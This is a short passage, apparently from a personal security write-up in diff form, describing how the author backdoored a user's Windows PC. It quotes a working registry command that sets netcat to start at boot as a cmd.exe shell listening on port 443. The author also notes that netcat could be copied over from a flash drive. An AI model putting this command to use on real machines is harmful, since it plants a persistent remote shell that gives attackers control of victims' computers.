 REG ADD HKLM\software\microsoft\windows\currentversion\run /v nc /d “C:\windows\system32\nc.exe -ldp 443 -e cmd.exe

-This created a persistent cmd shell giving me remote access to the user account through port 443, as soon as the computer booted again.
-This assuming that there was netcat installed on the victim’s computer, but if not, it's nothing you couldn't do using other attack vectors.
+This created a persistent Cmd Shell giving me remote access to the user account through port 443, as soon as the computer booted again.
+Of course this only works because netcat was installed on the victim’s computer, if not, it's nothing I couldn't do using other attack vectors.
 For instance, having my hands dirty already, I could simply have netcat executable in a flash drive, and copy it to the victim's computer.

 Guinea-pig user wasn’t the best example of protection and it’s not your fault that this is exploitable, but now that you know this, any breach you happen to have using this exploit — even though very unlikely — will be all on you.